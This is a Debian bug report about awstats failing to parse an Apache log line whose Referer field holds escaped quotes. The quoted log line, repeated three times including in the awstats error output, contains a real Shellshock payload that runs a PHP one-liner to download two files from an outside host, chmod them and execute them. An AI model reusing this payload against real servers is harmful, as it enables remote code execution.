Bug#856893: awstats: gets distracted by (probably) quotes in Referrer in Apache log

[Dominik George]

Package: awstats
Version: 7.2+dfsg-1
Severity: normal

AWstats in jessie gets distracted by the following line in an Apache log:

staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php 
-r '$a = \"http://x5d.su/s/susu1\";;''$b = \"http://x5d.su/s/susu2\";;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"

The issue, obviously, is the Referrer, which someone tried to leverage
to exploit the webserver, or PHP.

Unfortunately, the line breaks awstats, and is effectively a DoS against
AWstats.

While breaking AWstats will, in practice, probably cause no real harm,
it's still broken by valid input (the above posted line *is* valid
input…), so I am reporting this as critical.

I think the cause of the issue is AWstats not expecting escaped quotes
in the string and mistaking them for ending quotes of the Referrer.

Here's awstats' output hitting this line:

Error while processing /etc/awstats/awstats.www.teckids.org.conf
Create/Update database for config "/etc/awstats/awstats.www.teckids.org.conf" 
by AWStats version 7.2 (build 1.992)
>From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7548)
AWStats did not find any valid log lines that match your LogFormat parameter, 
in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format 
or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
This means each line in your web server log file need to have the following 
personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
And this is an example of records AWStats found in your log file (the record 
number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/admin.html HTTP/1.0" 404 481 "() { :;} ;echo;/usr/local/bin/php -r '$a 
= \"http://x5d.su/s/susu1\";;''$b = \"http://x5d.su/s/susu2\";;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.www.teckids.org.conf' file, web server or 
permissions) may be wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).
Error while processing /etc/awstats/awstats.conf
Create/Update database for config "/etc/awstats/awstats.conf" by AWStats 
version 7.2 (build 1.992)
>From data in log file "/var/log/apache2/other_vhosts_access.log"...
Phase 1 : First bypass old records, searching new record...
Direct access after last parsed record (after line 7554)
AWStats did not find any valid log lines that match your LogFormat parameter, 
in the 50th first non commented lines read of your log.
Your log file /var/log/apache2/other_vhosts_access.log must have a bad format 
or LogFormat parameter setup does not match this format.
Your AWStats LogFormat parameter is:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
This means each line in your web server log file need to have the following 
personalized log format:
%virtualname %host %other %logname %time1 %methodurl %code %bytesd %refererquot 
%uaquot
And this is an example of records AWStats found in your log file (the record 
number 50 in your log):
staging.teckids.org:80 91.121.101.163 - - [04/Mar/2017:23:30:05 +0100] "GET 
/cgi-bin/status/status.cgi HTTP/1.0" 404 488 "() { :;} ;echo;/usr/local/bin/php 
-r '$a = \"http://x5d.su/s/susu1\";;''$b = \"http://x5d.su/s/susu2\";;''$c = 
sys_get_temp_dir();''$d = \"susu1\";''$e = \"susu2\";''$f = \"chmod 777\";''$g 
= \"file_put_contents\";''$h = \"system\";''$i = \"file_exists\";''$j = 
\"fopen\";''if ($i($c . 
\"/$d\"))''{''exit(1);''}else{''echo($c);''$g(\"$c/$d\", $j(\"$a\", 
\"r\"));''$g(\"$c/$e\", $j(\"$b\", \"r\"));''$h(\"$f \" . $c 
.\"/$d\");''$h(\"$f \" . $c .\"/$e\");''$h($c . \"/$d\");''$h($c . 
\"/$e\");''}'" "-"
Setup ('/etc/awstats/awstats.conf' file, web server or permissions) may be 
wrong.
Check config file, permissions and AWStats documentation (in 'docs' directory).

-- System Information:
Debian Release: 8.7
  APT prefers stable-updates
  APT policy: (500, 'stable-updates'), (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores)
Locale: LANG=de_DE.UTF-8, LC_CTYPE=de_DE.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
Init: systemd (via /run/systemd/system)

Versions of packages awstats depends on:
ii  perl  5.20.2-3+deb8u6

Versions of packages awstats recommends:
ii  coreutils           8.23-4
ii  libnet-xwhois-perl  0.90-4

Versions of packages awstats suggests:
ii  apache2 [httpd]              2.4.10-10+deb8u8
ii  apache2-mpm-prefork [httpd]  2.4.10-10+deb8u8
ii  apache2-mpm-worker [httpd]   2.4.10-10+deb8u8
pn  libgeo-ipfree-perl           <none>
ii  libnet-dns-perl              0.81-2+deb8u1
ii  libnet-ip-perl               1.26-1
ii  liburi-perl                  1.64-1

-- Configuration Files:
/etc/awstats/awstats.conf changed [not included]
/etc/awstats/awstats.conf.local changed [not included]

-- no debconf information